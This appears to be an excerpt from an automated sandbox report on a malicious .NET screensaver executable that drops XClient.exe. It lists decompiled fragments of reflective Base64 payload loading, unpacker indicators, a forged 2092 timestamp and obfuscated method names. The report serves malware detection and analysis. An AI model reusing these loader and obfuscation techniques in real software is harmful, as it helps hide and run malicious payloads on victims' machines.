              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, 4QBfyOitSe4w0.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{mJgaCaREgzuBt[2],_3QiiXqkghrMk1.BvKeDBBOxQxE8(Convert.FromBase64String(mJgaCaREgzuBt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, 4QBfyOitSe4w0.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { mJgaCaREgzuBt[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              .NET source code contains potential unpacker
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, 4QBfyOitSe4w0.cs.Net Code: WtIrNy0hVmv60 System.AppDomain.Load(byte[])
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, 4QBfyOitSe4w0.cs.Net Code: EcGTN38sUvr8r System.AppDomain.Load(byte[])
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, 4QBfyOitSe4w0.cs.Net Code: EcGTN38sUvr8r
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.4091d60.7.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, Q04Ya9ByfkVda15Ypp.cs.Net Code: hp9bPiOkD0 System.Reflection.Assembly.Load(byte[])
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, Q04Ya9ByfkVda15Ypp.cs.Net Code: hp9bPiOkD0 System.Reflection.Assembly.Load(byte[])
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.420b7d0.5.raw.unpack, Q04Ya9ByfkVda15Ypp.cs.Net Code: hp9bPiOkD0 System.Reflection.Assembly.Load(byte[])
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.58c0000.8.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, 4QBfyOitSe4w0.cs.Net Code: WtIrNy0hVmv60 System.AppDomain.Load(byte[])
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, 4QBfyOitSe4w0.cs.Net Code: EcGTN38sUvr8r System.AppDomain.Load(byte[])
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, 4QBfyOitSe4w0.cs.Net Code: EcGTN38sUvr8r
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exeStatic PE information: 0xE70462D1 [Sun Oct 26 01:52:17 2092 UTC]
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_066936D7 push ebx; iretd 3_2_066936DA
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeCode function: 3_2_06690890 push 00000006h; ret 3_2_066908A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04BD647D pushad ; retf 4_2_04BD6491
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04BD42AD push ebx; ret 4_2_04BD42DA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08BD7210 push esp; iretd 4_2_08BD7569
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041BE421 pushad ; ret 7_2_041BE422
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041BE5C1 pushad ; ret 7_2_041BE5C2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041BE613 pushad ; ret 7_2_041BE61A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041BE610 pushad ; ret 7_2_041BE612
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041B8739 push cs; ret 7_2_041B873A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041B9769 push ss; ret 7_2_041B976A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041B878B push cs; ret 7_2_041B8792
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041B8788 push cs; ret 7_2_041B878A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041B97B9 push ss; ret 7_2_041B97BA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041BB08C push ecx; retn 0007h7_2_041BB09A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041B634D push eax; ret 7_2_041B6361
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041BAC0B push ds; ret 7_2_041BAC0E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041BAC09 push ds; ret 7_2_041BAC0A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041BAC0F push ds; ret 7_2_041BAC12
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041BAC49 push ds; ret 7_2_041BAC4A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041BDC93 push esi; ret 7_2_041BDC9A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041BDC90 push esi; ret 7_2_041BDC92
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041BDCE1 push edi; ret 7_2_041BDCE2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041B980B push ss; ret 7_2_041B9812
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041B9808 push ss; ret 7_2_041B980A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041B9833 push ss; ret 7_2_041B983A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041B9831 push ss; ret 7_2_041B9832
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041B9859 push ss; ret 7_2_041B985A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041B98B3 push ss; ret 7_2_041B98BA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041B98B0 push ss; ret 7_2_041B98B2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_041B9979 push ss; ret 7_2_041B997A
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exeStatic PE information: section name: .text entropy: 7.62631097980793
              Source: XClient.exe.3.drStatic PE information: section name: .text entropy: 7.62631097980793
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, OEGyOZzp9CU9Z.csHigh entropy of concatenated method names: 'QYSru9RU5dJWd', 'oi9Msqd9lmqFp', 'Gh7hF3Ceyz4jK', 'x2Kcz0n4msm1l2xM', '_4hDI5T8H5DCOIm19', 'T6aFt50BZla82ZA2', 'zpcOiMJTAlF4Htxi', 'TMFXXcHHzUU18I1r', 'ZSkwZRotVkMfXhhu', 'Um2YTXt47I4LIxgc'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, v5gt0V01k1MSsC0vwoxxBSwsEW4T1eqJw046P2ak3r4M2UHQ1RfEfyXqwlgDqRqjrSOTYe7.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'QTea7y2A8yGbO3jMXxuYC9YMcx5anBR', 'ZTIL5yWBKqapf9Byr2X2ov4nJgGIqjf', 'WHkIaWdsBqOvjqgK5gnz3Hq7FGRo7av', 'ksvOYOxtyeEJgsYuEk2j6FJUFQEL7jb'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, xEwUvc4BlwXCJ.csHigh entropy of concatenated method names: 'upuCmD95kpAQn', 'y64QqzLLzgvYy', 'nHNLF6ETZc4pz', 'wFe23vyXZnI9p', 'oPyUSoKLxc3MJ', 'j0yacKOMxpzCw3ZgwzP7SYa9OQxk42U', 'sG0Gu7E9uPceY4JkCHFeLM6rppnIbSk', 'Ic69UCn21qS8jQPeUpzcxe67X8Wwo7C', 'TVdrYhGtHgnmKaKEGnnQHc1AVeCLwz9', 'h9lFeGqDok6PiuQlRtN7JIQA7sN9FeZ'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, qMGvLJvouSdkL.csHigh entropy of concatenated method names: 'wAkM01TBZTMeC', 'ciAT4tkkLZ8RM', 'kyv1OiOaRjUOS', 'Is1Vu2C8gzfuWAcZ', 'ZrXVwJq1NPBYst66', 'YSiZ9OqRAn5DEoap', 'kpqsU8I4EmsXem6T', 'Y40LWH71GiExNonP', 'wlqe8L0mqhORb3Xh', 'cBzGfHA7YZurGUjI'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, 3QiiXqkghrMk1.csHigh entropy of concatenated method names: '_7TDRTDNWODVx9', 'bjpklCnAU25Ps', '_7whWzOffgktu7', 'H6OjpWJSuZpR7', 'LgXlVehbtF6PL', 'VPnNUxfUUOfKi', 'kVcqKyJkqeEYF', 'I9f9xqzndWbJy', 'Yh4ih3UMSubwZ', '_99oZuJy83I8YX'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, y42W1bnvO6P0K.csHigh entropy of concatenated method names: 'LG61tF1NXxMw5', 'oGvBieVy94qbk', 'YRTDDNA0tkzMF', 'VhxySITiopS46', 'qjbfovDtQWz1b', 'kLPAgXYZstRMB', 'hjXpfk41rTAw1', 'zs2SZYN7C9FhZ', 'zFQIATYwwABMt', 'qai42JONF5klU'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, 4QBfyOitSe4w0.csHigh entropy of concatenated method names: 'wcUZ2mvylwf7l', 'WtIrNy0hVmv60', 'JJgHyUlgPqlHQ', 'oHuREPEY4JElU', '_6vBzT4Nf8lYoy', 'Pai19egUGSisn', 'R5KRLNkgechqT', 'BCrPs0JGWRM5b', 'aoGqSGI44Uvct', 'irOTow0Wq5kJo'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, yI26puFLQ4OeW.csHigh entropy of concatenated method names: 'RPwrCFQWFVe3z', 'ykPv5m8mGukHt', 'rl3v1HQ21t3Ss', 'p5lTD1bRQsSns', 'N73EDMwGLrsYV', '_7giKgaxCmtum3', 'zR4TMA5bTqEsF', 'lNVI49QJGetLk', 'ivrYT9hUulqbg', 'G1GjbMsl7I84P'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, Udui5apYySouKBMT14.csHigh entropy of concatenated method names: 'Af1PYkPV6', 'PR4ufbV2o', 'Na8eggfVB', 'tccGmNNn0', 'Nc7U4t7ix', 'tMVwLEZKQ', 'oYfmOweGWPW0OMjSpl', 'iyUc388o7EydOdRx0F', 'wKm4rI2Eo', 'HNTWlaN5G'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, ka7sYHFqq7dPvT5nVb.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'gBvp0IHps2', 'koop5whEy3', 'i4upz0fhfI', 'gN0SaF6xyS', 'JsaS6EMuqE', 'LkvSprNFgW', 'PXKSSktkcR', 'cD7SiRsLfYtbOl2FpPc'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, ADkFnNn5Tlm0QIaDOi.csHigh entropy of concatenated method names: 'hgoCmPpjRZ', 'dDZCUmYFEj', 'WL1CDZDgrS', 'dfRCZ0X1mJ', 'JBqChoVK5L', 'eXXCqbR7ed', 'vtbC2g5Psq', 'DNpCVx0IxH', 'S1PCljQANs', 'vhuCfdWH72'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, DjlwRxU4LiRvxgFpeJ.csHigh entropy of concatenated method names: 'pCHFuVEjIZ', 'xnmFeuCUkC', 'ek2Fmj00MP', 'UocFURHFt2', 't3OFkwu1tm', 'BmJFssUOfJ', 'NtVF7gqnt8', 'YZdF4uv1Pd', 'Ms7F3II7fa', 'et7FWFVdsM'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, XYhn0PmGM2d0vqBguD.csHigh entropy of concatenated method names: 'JtQ8txXQtR', 'MkX8RcxJUE', 'x0Z8cIuZYI', 'yt88XWNABE', 'X3F8LfmjfE', 'JIT8rT6wVS', 'DGE8y2uHYV', 'Ipb8QuLZQD', 'L8Q80gj6rM', 'A8785oPllC'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, ovuju6DaxiV8v3NgFP.csHigh entropy of concatenated method names: 'uyLAKTa90H', 'URuA8ygFvI', 'AJCAHYRQJe', 'i8fA1T3ijb', 'zK7AB23JuV', 'TcvHLQitbn', 'txCHrBsHuh', 'BYJHylSDQ4', 'H89HQpLlVu', 'TInH0T1m66'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, dnnWTVcWiOSUoMKxjl.csHigh entropy of concatenated method names: 'ToString', 'nr7sfKOZhc', 'TwDsZTlW11', 'DZYsNp51hy', 'TJCshaQDPO', 'Fj0sqbORXS', 'QBnsOIIcLO', 'HXes2yQqQd', 'VpxsVJdWTi', 'EAasMSbsYt'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, bYvEAE0FmDgKllXo6e.csHigh entropy of concatenated method names: 'TOy3DY1W7g', 'UuM3ZXaJbb', 'Rk03NcH8Rw', 'wix3hMja66', 'nRj3q2bsej', 'IHD3OdBTPm', 'OCa32INt6R', 'CPA3VSwS0h', 'CTm3MLxedS', 'T0c3lobFVH'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, SCIXNr23CfXNXKcjQ5.csHigh entropy of concatenated method names: 'Yd71EfZgm2', 'rrJ1FD4ysE', 'BCj1AeD92I', 'B2CA5wg6ak', 'mL2AziwQBJ', 'nA41a74gmD', 'Daa16lWfSn', 'Wci1pHeCFn', 'MOv1SjWp4v', 'roy1b1DsEt'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, Ee1KgtXRbhccZ7sMGe.csHigh entropy of concatenated method names: 'Pwt7vWXGle', 'jo97d8qFRf', 'ToString', 'RLG7EeScyT', 'n0F78waNBI', 'YbH7FkR6jU', 'P8H7HeyCAC', 'c567Atw0wI', 'NX171OpfU4', 'On67BqoyTZ'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, a2rhWx5dUBFm60NB8M.csHigh entropy of concatenated method names: 'JLlWFBMkRs', 'TPoWHupbbU', 'SBJWAXUX5B', 'atuW1h8XUR', 'wTcW3WppBA', 'IUDWBShMY8', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, Q04Ya9ByfkVda15Ypp.csHigh entropy of concatenated method names: 'w80SKpd1QE', 'TfvSEuZKlk', 'cpZS8Jo0N9', 'cUiSFgVcCC', 'NVrSH5NU0H', 'LiISAGMyp2', 'mF0S1Q1TxP', 'JaESBfGfOf', 'oWRST14Zsa', 'lc2SvByV4B'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, LL5idJMlpFFnUZLDnT.csHigh entropy of concatenated method names: 'gp11xAj6Si', 'qQU19ytUvk', 'kFc1PstPKN', 'rGi1uBLR44', 'oFv1infXxG', 'FXi1eVpr7C', 'Mrf1Ge0Uvy', 'QUA1mZOXne', 't3h1U2E80v', 'zNt1wipJMb'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, S74R94tKMGmNqIEyqQ.csHigh entropy of concatenated method names: 'E2TklvHnD6', 'NPSkoj5LMC', 'zXfktLShOu', 'YS2kRK8YYD', 'hrYkZ6WXlr', 'PgmkNPcdH4', 's99khyeooU', 'SYmkqZAieM', 'w3TkOhBUJV', 'PsIk2ZmsVN'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, tyOgSPrRXGoq56AsYx.csHigh entropy of concatenated method names: 'Yej7QlA0E2', 'uRg75oZ2y5', 'QNN4aQDsVJ', 'M2h46V3wKe', 't0K7fhF1MS', 'TS47oE7PTJ', 'zFO7nMmpfM', 'xDg7txYso3', 'vgP7RvaWFO', 'Lch7cwRZkc'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, Vw7f8p8oGS4wsJPMJo.csHigh entropy of concatenated method names: 'Dispose', 'aPu60qaXnZ', 'w7dpZe7aV1', 'nUky64iXsU', 'cMk65cckeP', 'Nwj6zF1nab', 'ProcessDialogKey', 'XZppaYvEAE', 'hmDp6gKllX', 'P6eppa2rhW'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, xTGpsxZB81EqjVRX17.csHigh entropy of concatenated method names: 'EeAN11hVnuuXFa7Ot2G', 'YL7ZNWhkZTxRdPwrwNF', 'FkSA40HCZO', 'jwDA3MK0uM', 'as5AWXPAg5', 'M63C94h9imA9GPTqgpJ', 'XqJmJehIFlQXUm3WDv1'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, QxUVgL66mMgmFeb54i1.csHigh entropy of concatenated method names: 'yhnW5yudus', 'bb5WzNd6io', 'BgngaPtahW', 'oQyg6GZlLB', 'alYgp4yxbV', 'oATgSpvCUT', 'nJugbEaRNp', 'oDvgK0xmSo', 'CbggEXMi0s', 'hceg8I9FgI'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, jRAAR5zRlVId4oZWmj.csHigh entropy of concatenated method names: 'fGHWe22uFx', 'KxeWme0oiu', 'kZpWUJX7B1', 'oXNWDDWrjk', 'td6WZP8pNg', 'nUYWhsSnyu', 'bV0WqLt50V', 'NajWYRGiud', 'eUhWxVmoxH', 'SFWW9lmArK'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, aLE6e0yUoaPuqaXnZp.csHigh entropy of concatenated method names: 'lU83koOENm', 'G0d37MAwH2', 'xvl336BAp9', 'zIu3gxxhrc', 'ODQ3j69pTp', 'pqY3Y1v5Bx', 'Dispose', 'qiD4ED7MKE', 'TxJ48k9sBO', 'QMX4FGXxLg'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, TyDfo1bY3ZrsEhlwFm.csHigh entropy of concatenated method names: 'LEQ61Yhn0P', 'CM26Bd0vqB', 'x4L6viRvxg', 'gpe6dJ0JYg', 'c7A6krMkvu', 'vu66saxiV8', 'awPQbno2xCjjuEUKWs', 'PQ7Q6KOsvX2psFAINI', 'snp66h2MSF', 'gAj6SFpTdn'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, XJYgVjwL3PMpoS7ArM.csHigh entropy of concatenated method names: 'DngHiIeN65', 'avbHGrDEIl', 'MRwFNkOx5E', 'ileFhuRStQ', 'fDUFqfvROq', 'qxGFOJJKsC', 'dOUF22qm4Q', 'gyFFVbIDdG', 'ls6FMfRcZx', 'rIAFl2xQM4'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, gfpQDs6aGwak9n0C4Oi.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ftyWfKZ3sv', 'YyKWoens9f', 'JqSWn4aldt', 'YsuWtZ2tR7', 'U7PWRRH0Br', 'nniWc55UHK', 'e6DWXCF90H'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.7410000.9.raw.unpack, PyUexM6byOoMxTLOSna.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DETI3YPc2N', 'hs8IW3uoER', 'XChIgSciVH', 'UEOIIUa0I4', 'bj9Ij5tbNa', 'k2jIJhbn5Y', 'QFEIYiZMTs'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, Udui5apYySouKBMT14.csHigh entropy of concatenated method names: 'Af1PYkPV6', 'PR4ufbV2o', 'Na8eggfVB', 'tccGmNNn0', 'Nc7U4t7ix', 'tMVwLEZKQ', 'oYfmOweGWPW0OMjSpl', 'iyUc388o7EydOdRx0F', 'wKm4rI2Eo', 'HNTWlaN5G'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, ka7sYHFqq7dPvT5nVb.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'gBvp0IHps2', 'koop5whEy3', 'i4upz0fhfI', 'gN0SaF6xyS', 'JsaS6EMuqE', 'LkvSprNFgW', 'PXKSSktkcR', 'cD7SiRsLfYtbOl2FpPc'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, ADkFnNn5Tlm0QIaDOi.csHigh entropy of concatenated method names: 'hgoCmPpjRZ', 'dDZCUmYFEj', 'WL1CDZDgrS', 'dfRCZ0X1mJ', 'JBqChoVK5L', 'eXXCqbR7ed', 'vtbC2g5Psq', 'DNpCVx0IxH', 'S1PCljQANs', 'vhuCfdWH72'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, DjlwRxU4LiRvxgFpeJ.csHigh entropy of concatenated method names: 'pCHFuVEjIZ', 'xnmFeuCUkC', 'ek2Fmj00MP', 'UocFURHFt2', 't3OFkwu1tm', 'BmJFssUOfJ', 'NtVF7gqnt8', 'YZdF4uv1Pd', 'Ms7F3II7fa', 'et7FWFVdsM'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, XYhn0PmGM2d0vqBguD.csHigh entropy of concatenated method names: 'JtQ8txXQtR', 'MkX8RcxJUE', 'x0Z8cIuZYI', 'yt88XWNABE', 'X3F8LfmjfE', 'JIT8rT6wVS', 'DGE8y2uHYV', 'Ipb8QuLZQD', 'L8Q80gj6rM', 'A8785oPllC'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, ovuju6DaxiV8v3NgFP.csHigh entropy of concatenated method names: 'uyLAKTa90H', 'URuA8ygFvI', 'AJCAHYRQJe', 'i8fA1T3ijb', 'zK7AB23JuV', 'TcvHLQitbn', 'txCHrBsHuh', 'BYJHylSDQ4', 'H89HQpLlVu', 'TInH0T1m66'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, dnnWTVcWiOSUoMKxjl.csHigh entropy of concatenated method names: 'ToString', 'nr7sfKOZhc', 'TwDsZTlW11', 'DZYsNp51hy', 'TJCshaQDPO', 'Fj0sqbORXS', 'QBnsOIIcLO', 'HXes2yQqQd', 'VpxsVJdWTi', 'EAasMSbsYt'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, bYvEAE0FmDgKllXo6e.csHigh entropy of concatenated method names: 'TOy3DY1W7g', 'UuM3ZXaJbb', 'Rk03NcH8Rw', 'wix3hMja66', 'nRj3q2bsej', 'IHD3OdBTPm', 'OCa32INt6R', 'CPA3VSwS0h', 'CTm3MLxedS', 'T0c3lobFVH'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, SCIXNr23CfXNXKcjQ5.csHigh entropy of concatenated method names: 'Yd71EfZgm2', 'rrJ1FD4ysE', 'BCj1AeD92I', 'B2CA5wg6ak', 'mL2AziwQBJ', 'nA41a74gmD', 'Daa16lWfSn', 'Wci1pHeCFn', 'MOv1SjWp4v', 'roy1b1DsEt'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, Ee1KgtXRbhccZ7sMGe.csHigh entropy of concatenated method names: 'Pwt7vWXGle', 'jo97d8qFRf', 'ToString', 'RLG7EeScyT', 'n0F78waNBI', 'YbH7FkR6jU', 'P8H7HeyCAC', 'c567Atw0wI', 'NX171OpfU4', 'On67BqoyTZ'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, a2rhWx5dUBFm60NB8M.csHigh entropy of concatenated method names: 'JLlWFBMkRs', 'TPoWHupbbU', 'SBJWAXUX5B', 'atuW1h8XUR', 'wTcW3WppBA', 'IUDWBShMY8', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, Q04Ya9ByfkVda15Ypp.csHigh entropy of concatenated method names: 'w80SKpd1QE', 'TfvSEuZKlk', 'cpZS8Jo0N9', 'cUiSFgVcCC', 'NVrSH5NU0H', 'LiISAGMyp2', 'mF0S1Q1TxP', 'JaESBfGfOf', 'oWRST14Zsa', 'lc2SvByV4B'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, LL5idJMlpFFnUZLDnT.csHigh entropy of concatenated method names: 'gp11xAj6Si', 'qQU19ytUvk', 'kFc1PstPKN', 'rGi1uBLR44', 'oFv1infXxG', 'FXi1eVpr7C', 'Mrf1Ge0Uvy', 'QUA1mZOXne', 't3h1U2E80v', 'zNt1wipJMb'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, S74R94tKMGmNqIEyqQ.csHigh entropy of concatenated method names: 'E2TklvHnD6', 'NPSkoj5LMC', 'zXfktLShOu', 'YS2kRK8YYD', 'hrYkZ6WXlr', 'PgmkNPcdH4', 's99khyeooU', 'SYmkqZAieM', 'w3TkOhBUJV', 'PsIk2ZmsVN'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, tyOgSPrRXGoq56AsYx.csHigh entropy of concatenated method names: 'Yej7QlA0E2', 'uRg75oZ2y5', 'QNN4aQDsVJ', 'M2h46V3wKe', 't0K7fhF1MS', 'TS47oE7PTJ', 'zFO7nMmpfM', 'xDg7txYso3', 'vgP7RvaWFO', 'Lch7cwRZkc'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, Vw7f8p8oGS4wsJPMJo.csHigh entropy of concatenated method names: 'Dispose', 'aPu60qaXnZ', 'w7dpZe7aV1', 'nUky64iXsU', 'cMk65cckeP', 'Nwj6zF1nab', 'ProcessDialogKey', 'XZppaYvEAE', 'hmDp6gKllX', 'P6eppa2rhW'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, xTGpsxZB81EqjVRX17.csHigh entropy of concatenated method names: 'EeAN11hVnuuXFa7Ot2G', 'YL7ZNWhkZTxRdPwrwNF', 'FkSA40HCZO', 'jwDA3MK0uM', 'as5AWXPAg5', 'M63C94h9imA9GPTqgpJ', 'XqJmJehIFlQXUm3WDv1'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, QxUVgL66mMgmFeb54i1.csHigh entropy of concatenated method names: 'yhnW5yudus', 'bb5WzNd6io', 'BgngaPtahW', 'oQyg6GZlLB', 'alYgp4yxbV', 'oATgSpvCUT', 'nJugbEaRNp', 'oDvgK0xmSo', 'CbggEXMi0s', 'hceg8I9FgI'
              Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.425e1f0.6.raw.unpack, jRAAR5zRlVId4oZWmj.csHigh entropy of concatenated method names: 'fGHWe22uFx', 'KxeWme0oiu', 'kZpWUJX7B1', 'oXNWDDWrjk', 'td6WZP8pNg', 'nUYWhsSnyu', 'bV0WqLt50V', 'NajWYRGiud', 'eUhWxVmoxH', 'SFWW9lmArK'
